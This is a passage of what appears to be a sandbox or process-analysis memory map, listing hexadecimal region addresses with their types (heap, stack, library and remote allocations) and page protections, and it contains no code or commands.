page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
204E74B5000
|
heap
|
page read and write
|
||
2178CBC9000
|
heap
|
page read and write
|
||
1C4CFFE7000
|
heap
|
page read and write
|
||
1ECD5F44000
|
heap
|
page read and write
|
||
2546BC52000
|
heap
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
1A7C6C47000
|
heap
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
1AA51C77000
|
trusted library allocation
|
page read and write
|
||
1009BF000
|
stack
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
245938D3000
|
heap
|
page read and write
|
||
7FF83B840000
|
trusted library allocation
|
page read and write
|
||
1FBE546D000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
1A8DDCE4000
|
heap
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
1A8E16E7000
|
trusted library allocation
|
page read and write
|
||
2546B769000
|
heap
|
page read and write
|
||
1C4CFFE7000
|
heap
|
page read and write
|
||
204E7C87000
|
heap
|
page read and write
|
||
1C4CFFDD000
|
heap
|
page read and write
|
||
1EF4FEA0000
|
trusted library allocation
|
page read and write
|
||
204E746B000
|
heap
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
189FDF30000
|
trusted library allocation
|
page read and write
|
||
7FF83B880000
|
trusted library allocation
|
page execute and read and write
|
||
2D4A5BA000
|
stack
|
page read and write
|
||
174D2E40000
|
heap
|
page read and write
|
||
1C4D0117000
|
heap
|
page read and write
|
||
2D4A4B7000
|
stack
|
page read and write
|
||
1BA5ABDA000
|
trusted library allocation
|
page read and write
|
||
1C4D0054000
|
heap
|
page read and write
|
||
2546B7A1000
|
heap
|
page read and write
|
||
174D3020000
|
heap
|
page read and write
|
||
204E7A83000
|
heap
|
page read and write
|
||
24593A6A000
|
heap
|
page read and write
|
||
204E7468000
|
heap
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
24593AA5000
|
heap
|
page read and write
|
||
2546BC23000
|
heap
|
page read and write
|
||
7FF83B941000
|
trusted library allocation
|
page read and write
|
||
2390A0D0000
|
heap
|
page read and write
|
||
7FF83B972000
|
trusted library allocation
|
page read and write
|
||
1EF6A240000
|
heap
|
page read and write
|
||
24593A48000
|
heap
|
page read and write
|
||
1EF4FD81000
|
heap
|
page read and write
|
||
F5096FF000
|
stack
|
page read and write
|
||
1C4CFFE9000
|
heap
|
page read and write
|
||
F5092F5000
|
stack
|
page read and write
|
||
1ECD6450000
|
heap
|
page execute and read and write
|
||
2178E490000
|
trusted library allocation
|
page read and write
|
||
139D8E00000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
7FF83BB40000
|
trusted library allocation
|
page read and write
|
||
1C4D04FE000
|
heap
|
page read and write
|
||
174ECE2B000
|
heap
|
page read and write
|
||
1FBE54E0000
|
heap
|
page read and write
|
||
1BA72C53000
|
heap
|
page read and write
|
||
2390A14C000
|
heap
|
page read and write
|
||
7FF83B930000
|
trusted library allocation
|
page read and write
|
||
2459363A000
|
heap
|
page read and write
|
||
1BA72CF9000
|
heap
|
page read and write
|
||
1C4CE17E000
|
heap
|
page read and write
|
||
5768EFF000
|
stack
|
page read and write
|
||
1A7C67DD000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
189FDF10000
|
heap
|
page execute and read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
7FF83B846000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
2103F2A5000
|
trusted library allocation
|
page read and write
|
||
561727D000
|
stack
|
page read and write
|
||
1EF61C71000
|
trusted library allocation
|
page read and write
|
||
1BA58DC0000
|
heap
|
page read and write
|
||
1BA72C7C000
|
heap
|
page read and write
|
||
24593A00000
|
heap
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
56674FE000
|
stack
|
page read and write
|
||
189FC140000
|
trusted library allocation
|
page read and write
|
||
1C4D04CF000
|
heap
|
page read and write
|
||
2546BA36000
|
heap
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page read and write
|
||
25469976000
|
heap
|
page read and write
|
||
B9A653B000
|
stack
|
page read and write
|
||
85F43FE000
|
stack
|
page read and write
|
||
2178EA16000
|
trusted library allocation
|
page read and write
|
||
2546B74C000
|
heap
|
page read and write
|
||
1C4D04FE000
|
heap
|
page read and write
|
||
B9A64BE000
|
stack
|
page read and write
|
||
7FF83B9A2000
|
trusted library allocation
|
page read and write
|
||
7FF83B856000
|
trusted library allocation
|
page read and write
|
||
2546B75C000
|
heap
|
page read and write
|
||
7FF83B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
91B107F000
|
stack
|
page read and write
|
||
2178CC35000
|
heap
|
page read and write
|
||
1A7C49DF000
|
heap
|
page read and write
|
||
1C4CE1C0000
|
heap
|
page read and write
|
||
1C4D0112000
|
heap
|
page read and write
|
||
245935D1000
|
heap
|
page read and write
|
||
174D2EA0000
|
heap
|
page read and write
|
||
1FBCB322000
|
heap
|
page read and write
|
||
1EF69E7B000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
24593A6B000
|
heap
|
page read and write
|
||
7FF83B962000
|
trusted library allocation
|
page read and write
|
||
2390B9D0000
|
trusted library allocation
|
page read and write
|
||
174ECED0000
|
heap
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
24593D16000
|
heap
|
page read and write
|
||
24593777000
|
heap
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
7FF83B7C4000
|
trusted library allocation
|
page read and write
|
||
139D8A3E000
|
heap
|
page read and write
|
||
1FBCD693000
|
trusted library allocation
|
page read and write
|
||
1A8DF920000
|
heap
|
page read and write
|
||
1EF4FC20000
|
heap
|
page read and write
|
||
1C4D07C8000
|
heap
|
page read and write
|
||
1A8E16E2000
|
trusted library allocation
|
page read and write
|
||
24591790000
|
heap
|
page read and write
|
||
7FF7A1980000
|
unkown
|
page write copy
|
||
D012FE000
|
stack
|
page read and write
|
||
2546B77C000
|
heap
|
page read and write
|
||
2546BC44000
|
heap
|
page read and write
|
||
174ED2F0000
|
heap
|
page read and write
|
||
2DB32BA3000
|
trusted library allocation
|
page read and write
|
||
1FBCD3EA000
|
trusted library allocation
|
page read and write
|
||
24593D6A000
|
heap
|
page read and write
|
||
2D4A43E000
|
stack
|
page read and write
|
||
204E7C84000
|
heap
|
page read and write
|
||
1A8E10D3000
|
trusted library allocation
|
page read and write
|
||
117E6FF000
|
stack
|
page read and write
|
||
BF5377E000
|
stack
|
page read and write
|
||
204E7477000
|
heap
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
1C4CE20C000
|
heap
|
page read and write
|
||
1EF69D90000
|
heap
|
page read and write
|
||
245938C4000
|
heap
|
page read and write
|
||
24593619000
|
heap
|
page read and write
|
||
1AA698C0000
|
heap
|
page read and write
|
||
1A7C6C34000
|
heap
|
page read and write
|
||
1A7C6C6E000
|
heap
|
page read and write
|
||
204E7470000
|
heap
|
page read and write
|
||
1A8E10E1000
|
trusted library allocation
|
page read and write
|
||
2D4A2FE000
|
stack
|
page read and write
|
||
7FF83B97A000
|
trusted library allocation
|
page read and write
|
||
1A7C67E0000
|
heap
|
page read and write
|
||
1C4CE4E0000
|
heap
|
page read and write
|
||
189FBFEA000
|
heap
|
page read and write
|
||
245936E0000
|
remote allocation
|
page read and write
|
||
204E7F77000
|
heap
|
page read and write
|
||
1ECEEAF0000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
B9A61BE000
|
stack
|
page read and write
|
||
174ECE49000
|
heap
|
page read and write
|
||
2459176A000
|
heap
|
page read and write
|
||
2080E110000
|
heap
|
page read and write
|
||
24593A8A000
|
heap
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
883C73E000
|
stack
|
page read and write
|
||
2DB32620000
|
heap
|
page execute and read and write
|
||
20828180000
|
heap
|
page read and write
|
||
1C4D04C3000
|
heap
|
page read and write
|
||
174D2E30000
|
trusted library allocation
|
page read and write
|
||
1C4CE226000
|
heap
|
page read and write
|
||
1FBCD3E0000
|
trusted library allocation
|
page read and write
|
||
1A7C4925000
|
heap
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
2178EBCD000
|
trusted library allocation
|
page read and write
|
||
24593A6B000
|
heap
|
page read and write
|
||
2546BC27000
|
heap
|
page read and write
|
||
2390A191000
|
heap
|
page read and write
|
||
7FF83B941000
|
trusted library allocation
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
7FF83B7A3000
|
trusted library allocation
|
page execute and read and write
|
||
245935D4000
|
heap
|
page read and write
|
||
1C4CE199000
|
heap
|
page read and write
|
||
24591770000
|
heap
|
page read and write
|
||
2DB3082A000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
217A6AF1000
|
heap
|
page read and write
|
||
204E7F85000
|
heap
|
page read and write
|
||
1C4CE1AF000
|
heap
|
page read and write
|
||
9FC3E7E000
|
stack
|
page read and write
|
||
7FF7A1982000
|
unkown
|
page read and write
|
||
7FF83B793000
|
trusted library allocation
|
page execute and read and write
|
||
204E7CAE000
|
heap
|
page read and write
|
||
7FF83B7D3000
|
trusted library allocation
|
page execute and read and write
|
||
245917A3000
|
heap
|
page read and write
|
||
245916FD000
|
heap
|
page read and write
|
||
2DB30851000
|
heap
|
page read and write
|
||
1FBCD2EB000
|
trusted library allocation
|
page read and write
|
||
100737000
|
stack
|
page read and write
|
||
7FF83B974000
|
trusted library allocation
|
page read and write
|
||
5399E7D000
|
stack
|
page read and write
|
||
1ECD6837000
|
trusted library allocation
|
page read and write
|
||
2546B766000
|
heap
|
page read and write
|
||
1BA5A610000
|
heap
|
page readonly
|
||
2178E4C0000
|
heap
|
page readonly
|
||
2103BD2F000
|
heap
|
page read and write
|
||
56177BE000
|
stack
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
7FF83B932000
|
trusted library allocation
|
page read and write
|
||
1BA58D10000
|
heap
|
page read and write
|
||
20827D20000
|
heap
|
page read and write
|
||
7FF83B8E0000
|
trusted library allocation
|
page execute and read and write
|
||
18C00001000
|
trusted library allocation
|
page read and write
|
||
7FF83B971000
|
trusted library allocation
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
BF53BBF000
|
stack
|
page read and write
|
||
1A7C6C47000
|
heap
|
page read and write
|
||
2178E530000
|
heap
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page read and write
|
||
2179E9A1000
|
trusted library allocation
|
page read and write
|
||
2080DE88000
|
heap
|
page read and write
|
||
7FF83B971000
|
trusted library allocation
|
page read and write
|
||
217A6AFB000
|
heap
|
page read and write
|
||
883C578000
|
stack
|
page read and write
|
||
24593A7E000
|
heap
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page execute and read and write
|
||
18980013000
|
trusted library allocation
|
page read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page read and write
|
||
21790053000
|
trusted library allocation
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
189FE160000
|
heap
|
page read and write
|
||
2390B9E0000
|
heap
|
page readonly
|
||
1C4D07C1000
|
heap
|
page read and write
|
||
100A3B000
|
stack
|
page read and write
|
||
2390C000000
|
trusted library allocation
|
page read and write
|
||
7FF83B81C000
|
trusted library allocation
|
page execute and read and write
|
||
204E7C85000
|
heap
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
174E4B20000
|
trusted library allocation
|
page read and write
|
||
1A7C6C4B000
|
heap
|
page read and write
|
||
7FF83B880000
|
trusted library allocation
|
page execute and read and write
|
||
1C4D03D0000
|
remote allocation
|
page read and write
|
||
56172FF000
|
stack
|
page read and write
|
||
24593A45000
|
heap
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
1A8F7B20000
|
heap
|
page read and write
|
||
139D8A1C000
|
heap
|
page read and write
|
||
2459172C000
|
heap
|
page read and write
|
||
21055D0D000
|
heap
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
7FF83B972000
|
trusted library allocation
|
page read and write
|
||
1C4D04BF000
|
heap
|
page read and write
|
||
1A7C6800000
|
heap
|
page read and write
|
||
1C4D04EF000
|
heap
|
page read and write
|
||
7FF83B88E000
|
trusted library allocation
|
page execute and read and write
|
||
7FF7A1984000
|
unkown
|
page readonly
|
||
2103BCA0000
|
heap
|
page read and write
|
||
189804C0000
|
trusted library allocation
|
page read and write
|
||
2546BB30000
|
remote allocation
|
page read and write
|
||
91B163E000
|
stack
|
page read and write
|
||
204E7FA3000
|
heap
|
page read and write
|
||
1A7C49BC000
|
heap
|
page read and write
|
||
1C4D0488000
|
heap
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
1A7C67D4000
|
heap
|
page read and write
|
||
24593644000
|
heap
|
page read and write
|
||
2390A14A000
|
heap
|
page read and write
|
||
1C4D07D0000
|
heap
|
page read and write
|
||
24593D11000
|
heap
|
page read and write
|
||
7FF83B7A2000
|
trusted library allocation
|
page read and write
|
||
245919CE000
|
heap
|
page read and write
|
||
7FF83BAE4000
|
trusted library allocation
|
page read and write
|
||
1C4D07D8000
|
heap
|
page read and write
|
||
7FF83B960000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BB10000
|
trusted library allocation
|
page execute and read and write
|
||
208281B4000
|
heap
|
page read and write
|
||
1C4CE1E2000
|
heap
|
page read and write
|
||
245939DC000
|
heap
|
page read and write
|
||
1AA69800000
|
heap
|
page read and write
|
||
7FF83B9B2000
|
trusted library allocation
|
page read and write
|
||
7FF83B983000
|
trusted library allocation
|
page execute and read and write
|
||
254698F1000
|
heap
|
page read and write
|
||
5399A7E000
|
stack
|
page read and write
|
||
1C4D02A6000
|
heap
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
24593A85000
|
heap
|
page read and write
|
||
1AA4F8C5000
|
heap
|
page read and write
|
||
B9A643E000
|
stack
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
23924380000
|
heap
|
page read and write
|
||
174E4B5C000
|
trusted library allocation
|
page read and write
|
||
1C4D04CE000
|
heap
|
page read and write
|
||
24593777000
|
heap
|
page read and write
|
||
1A8EFBC7000
|
trusted library allocation
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page read and write
|
||
1C4D02B2000
|
heap
|
page read and write
|
||
24591734000
|
heap
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page execute and read and write
|
||
2DB32215000
|
heap
|
page read and write
|
||
2DB4AAA0000
|
heap
|
page execute and read and write
|
||
1BA5A600000
|
trusted library allocation
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
1A7C49BC000
|
heap
|
page read and write
|
||
1A7C6A71000
|
heap
|
page read and write
|
||
18C71CF6000
|
heap
|
page execute and read and write
|
||
7FF83B7D4000
|
trusted library allocation
|
page read and write
|
||
7FF83B7B0000
|
trusted library allocation
|
page read and write
|
||
24593AA9000
|
heap
|
page read and write
|
||
1EF69F80000
|
heap
|
page read and write
|
||
2390A156000
|
heap
|
page read and write
|
||
1A7C67E5000
|
heap
|
page read and write
|
||
1AA51DE8000
|
trusted library allocation
|
page read and write
|
||
24591770000
|
heap
|
page read and write
|
||
5666F13000
|
stack
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
18C71EBC000
|
heap
|
page read and write
|
||
1C4D02B2000
|
heap
|
page read and write
|
||
2105618F000
|
heap
|
page read and write
|
||
174E4B88000
|
trusted library allocation
|
page read and write
|
||
7FF83B9DB000
|
trusted library allocation
|
page read and write
|
||
217A6DA0000
|
heap
|
page read and write
|
||
24593A45000
|
heap
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
189FC110000
|
trusted library allocation
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
1C4D084B000
|
heap
|
page read and write
|
||
1C4CE1E8000
|
heap
|
page read and write
|
||
2546BC36000
|
heap
|
page read and write
|
||
1FBCD3D7000
|
trusted library allocation
|
page read and write
|
||
1EF69DDB000
|
heap
|
page read and write
|
||
174E4B43000
|
trusted library allocation
|
page read and write
|
||
1A7C6A71000
|
heap
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
1ECD6787000
|
trusted library allocation
|
page read and write
|
||
1A8DDB7C000
|
heap
|
page read and write
|
||
1ECEE56F000
|
heap
|
page read and write
|
||
7FF83B7C3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
1C4D03D0000
|
remote allocation
|
page read and write
|
||
208113A4000
|
trusted library allocation
|
page read and write
|
||
21056140000
|
heap
|
page read and write
|
||
2080DD90000
|
heap
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
1C4D0091000
|
heap
|
page read and write
|
||
21790077000
|
trusted library allocation
|
page read and write
|
||
2103BDC7000
|
heap
|
page read and write
|
||
1C4D0001000
|
heap
|
page read and write
|
||
955AF9F000
|
stack
|
page read and write
|
||
174ECE77000
|
heap
|
page read and write
|
||
7FF83B850000
|
trusted library allocation
|
page execute and read and write
|
||
18980049000
|
trusted library allocation
|
page read and write
|
||
24593D00000
|
heap
|
page read and write
|
||
1C4D0469000
|
heap
|
page read and write
|
||
1AA518BF000
|
trusted library allocation
|
page read and write
|
||
189FE1A2000
|
heap
|
page read and write
|
||
24593A75000
|
heap
|
page read and write
|
||
18C10001000
|
trusted library allocation
|
page read and write
|
||
1EF69C79000
|
heap
|
page read and write
|
||
1BA72C5A000
|
heap
|
page read and write
|
||
9FC3B79000
|
stack
|
page read and write
|
||
1FBCD2D1000
|
trusted library allocation
|
page read and write
|
||
24593770000
|
heap
|
page read and write
|
||
18C6FD44000
|
heap
|
page read and write
|
||
1AA69990000
|
heap
|
page read and write
|
||
1C4D0011000
|
heap
|
page read and write
|
||
7FF83B7D0000
|
trusted library allocation
|
page read and write
|
||
18C6FE50000
|
heap
|
page read and write
|
||
B9A623C000
|
stack
|
page read and write
|
||
9FC39FF000
|
stack
|
page read and write
|
||
7FF83B971000
|
trusted library allocation
|
page read and write
|
||
1C4D085C000
|
heap
|
page read and write
|
||
1EF61E2B000
|
trusted library allocation
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
1C4D04FE000
|
heap
|
page read and write
|
||
1A8DDD80000
|
heap
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
1C4CE1E8000
|
heap
|
page read and write
|
||
20827E26000
|
heap
|
page execute and read and write
|
||
1ECEE782000
|
heap
|
page read and write
|
||
18C71EAE000
|
heap
|
page read and write
|
||
1C4D0466000
|
heap
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
24593611000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
2459175E000
|
heap
|
page read and write
|
||
98D63FD000
|
stack
|
page read and write
|
||
2546B78D000
|
heap
|
page read and write
|
||
24593618000
|
heap
|
page read and write
|
||
1AA4F889000
|
heap
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
24593D38000
|
heap
|
page read and write
|
||
1C4D07DC000
|
heap
|
page read and write
|
||
1C4D07CC000
|
heap
|
page read and write
|
||
2104DBC1000
|
trusted library allocation
|
page read and write
|
||
1A7C683C000
|
heap
|
page read and write
|
||
18C71BD0000
|
heap
|
page read and write
|
||
2178E980000
|
heap
|
page execute and read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
2459171B000
|
heap
|
page read and write
|
||
204E7F7A000
|
heap
|
page read and write
|
||
539970F000
|
stack
|
page read and write
|
||
7FF83B793000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
204E7A83000
|
heap
|
page read and write
|
||
204E74AC000
|
heap
|
page read and write
|
||
7FF83B7A0000
|
trusted library allocation
|
page read and write
|
||
1C4CE1B7000
|
heap
|
page read and write
|
||
1ECD45CC000
|
heap
|
page read and write
|
||
204E7B80000
|
remote allocation
|
page read and write
|
||
2D4A1FD000
|
stack
|
page read and write
|
||
217905AD000
|
trusted library allocation
|
page read and write
|
||
5399EFF000
|
stack
|
page read and write
|
||
1A8F7EE5000
|
heap
|
page read and write
|
||
57693FE000
|
stack
|
page read and write
|
||
2178E990000
|
heap
|
page read and write
|
||
1A7C6A73000
|
heap
|
page read and write
|
||
1C4D04FB000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
2546BA43000
|
heap
|
page read and write
|
||
539AB4D000
|
stack
|
page read and write
|
||
1C4D0114000
|
heap
|
page read and write
|
||
955B5FE000
|
stack
|
page read and write
|
||
7FF83B7D3000
|
trusted library allocation
|
page execute and read and write
|
||
BF5367D000
|
stack
|
page read and write
|
||
2459176C000
|
heap
|
page read and write
|
||
1A7C6806000
|
heap
|
page read and write
|
||
24593A49000
|
heap
|
page read and write
|
||
1EF69FBD000
|
heap
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
24593631000
|
heap
|
page read and write
|
||
2546B762000
|
heap
|
page read and write
|
||
1FBE5860000
|
heap
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page execute and read and write
|
||
18C004AF000
|
trusted library allocation
|
page read and write
|
||
174D4BE1000
|
trusted library allocation
|
page read and write
|
||
2DB326E0000
|
heap
|
page read and write
|
||
1FBE55C0000
|
heap
|
page read and write
|
||
24593A78000
|
heap
|
page read and write
|
||
91B1538000
|
stack
|
page read and write
|
||
85F41FE000
|
stack
|
page read and write
|
||
245939FA000
|
heap
|
page read and write
|
||
20828190000
|
heap
|
page read and write
|
||
7FF83B870000
|
trusted library allocation
|
page read and write
|
||
189FC1FC000
|
heap
|
page read and write
|
||
7FF83B870000
|
trusted library allocation
|
page read and write
|
||
1AA518CC000
|
trusted library allocation
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
24593270000
|
heap
|
page read and write
|
||
245938C0000
|
heap
|
page read and write
|
||
7FF83BABF000
|
trusted library allocation
|
page read and write
|
||
1ECE64D9000
|
trusted library allocation
|
page read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
204E7460000
|
heap
|
page read and write
|
||
7FF83B962000
|
trusted library allocation
|
page read and write
|
||
1A7C6829000
|
heap
|
page read and write
|
||
1A7C68F0000
|
remote allocation
|
page read and write
|
||
1C4D07D5000
|
heap
|
page read and write
|
||
189FBFDD000
|
heap
|
page read and write
|
||
1A7C6824000
|
heap
|
page read and write
|
||
883C4FE000
|
stack
|
page read and write
|
||
1C4D0001000
|
heap
|
page read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
1C4D0461000
|
heap
|
page read and write
|
||
1ECD43D0000
|
heap
|
page read and write
|
||
1ECEE5FB000
|
heap
|
page read and write
|
||
1BA58CCA000
|
heap
|
page read and write
|
||
2103D700000
|
heap
|
page read and write
|
||
174ECDB3000
|
heap
|
page read and write
|
||
2103F28C000
|
trusted library allocation
|
page read and write
|
||
1A8DDB8E000
|
heap
|
page read and write
|
||
1FBCB5F0000
|
heap
|
page read and write
|
||
D0123E000
|
stack
|
page read and write
|
||
174D2ED8000
|
heap
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
BF53C3E000
|
stack
|
page read and write
|
||
1EF51AA0000
|
trusted library allocation
|
page read and write
|
||
1C4D0041000
|
heap
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
1C4D04E0000
|
heap
|
page read and write
|
||
18C008A4000
|
trusted library allocation
|
page read and write
|
||
1ECD68FA000
|
trusted library allocation
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
1C4CE20C000
|
heap
|
page read and write
|
||
7FF83B87C000
|
trusted library allocation
|
page execute and read and write
|
||
204E744D000
|
heap
|
page read and write
|
||
1BA58E45000
|
heap
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
24593D6F000
|
heap
|
page read and write
|
||
2546BC44000
|
heap
|
page read and write
|
||
2390A060000
|
heap
|
page read and write
|
||
2546BA52000
|
heap
|
page read and write
|
||
245935F1000
|
heap
|
page read and write
|
||
FE1AF3C000
|
stack
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
1A8DDBBA000
|
heap
|
page read and write
|
||
174D2F40000
|
heap
|
page read and write
|
||
217904E2000
|
trusted library allocation
|
page read and write
|
||
1BA5AB80000
|
trusted library allocation
|
page read and write
|
||
1C4CE1A9000
|
heap
|
page read and write
|
||
174D4C22000
|
trusted library allocation
|
page read and write
|
||
2103C060000
|
heap
|
page read and write
|
||
BF53A3E000
|
stack
|
page read and write
|
||
1A7C67EB000
|
heap
|
page read and write
|
||
139D8A3E000
|
heap
|
page read and write
|
||
1BA5AFEB000
|
trusted library allocation
|
page read and write
|
||
24593D03000
|
heap
|
page read and write
|
||
21055DE6000
|
heap
|
page execute and read and write
|
||
1A7C4C9E000
|
heap
|
page read and write
|
||
7FF83B7A0000
|
trusted library allocation
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
24593A86000
|
heap
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
1FBCB670000
|
heap
|
page read and write
|
||
189FDF50000
|
heap
|
page execute and read and write
|
||
189FC1F5000
|
heap
|
page read and write
|
||
7FF83B950000
|
trusted library allocation
|
page execute and read and write
|
||
1EF69FC3000
|
heap
|
page read and write
|
||
1EF4FD00000
|
heap
|
page read and write
|
||
2080F7B6000
|
heap
|
page read and write
|
||
1FBCD96B000
|
trusted library allocation
|
page read and write
|
||
7FF83B880000
|
trusted library allocation
|
page execute and read and write
|
||
1FBCB595000
|
heap
|
page read and write
|
||
245916F0000
|
heap
|
page read and write
|
||
18C10011000
|
trusted library allocation
|
page read and write
|
||
2546B759000
|
heap
|
page read and write
|
||
245935E3000
|
heap
|
page read and write
|
||
7FF83BB10000
|
trusted library allocation
|
page read and write
|
||
174D4C1C000
|
trusted library allocation
|
page read and write
|
||
2178E9E4000
|
trusted library allocation
|
page read and write
|
||
5399FFE000
|
stack
|
page read and write
|
||
1A7C6808000
|
heap
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
139D8A3B000
|
heap
|
page read and write
|
||
1C4D004F000
|
heap
|
page read and write
|
||
245938C6000
|
heap
|
page read and write
|
||
7FF7A18DA000
|
unkown
|
page readonly
|
||
24593D50000
|
heap
|
page read and write
|
||
1C4D04AB000
|
heap
|
page read and write
|
||
1EF53859000
|
trusted library allocation
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
1C4CFFF5000
|
heap
|
page read and write
|
||
7FF7A1781000
|
unkown
|
page execute read
|
||
204E7C93000
|
heap
|
page read and write
|
||
1A7C6829000
|
heap
|
page read and write
|
||
1A7C6F35000
|
heap
|
page read and write
|
||
1AA698AB000
|
heap
|
page read and write
|
||
2459172E000
|
heap
|
page read and write
|
||
2080DDB0000
|
heap
|
page read and write
|
||
208112E3000
|
trusted library allocation
|
page read and write
|
||
1C4D07C1000
|
heap
|
page read and write
|
||
1898047B000
|
trusted library allocation
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
245935E9000
|
heap
|
page read and write
|
||
5617072000
|
stack
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
2546BC3F000
|
heap
|
page read and write
|
||
883C3FE000
|
stack
|
page read and write
|
||
1A7C4937000
|
heap
|
page read and write
|
||
98D68FC000
|
stack
|
page read and write
|
||
204E74AF000
|
heap
|
page read and write
|
||
204E7453000
|
heap
|
page read and write
|
||
1C4CFFEC000
|
heap
|
page read and write
|
||
24593AAA000
|
heap
|
page read and write
|
||
245935F4000
|
heap
|
page read and write
|
||
9FC3BF8000
|
stack
|
page read and write
|
||
1AA51464000
|
heap
|
page read and write
|
||
1C4D011A000
|
heap
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
1C4D04F5000
|
heap
|
page read and write
|
||
1A8DF8E0000
|
heap
|
page execute and read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
1C4CE1EC000
|
heap
|
page read and write
|
||
7FF83B850000
|
trusted library allocation
|
page execute and read and write
|
||
2178CB40000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
24593AAA000
|
heap
|
page read and write
|
||
7FF83B981000
|
trusted library allocation
|
page read and write
|
||
1EF51B67000
|
heap
|
page execute and read and write
|
||
1C4CFFF9000
|
heap
|
page read and write
|
||
2178EA12000
|
trusted library allocation
|
page read and write
|
||
1BA5AA81000
|
trusted library allocation
|
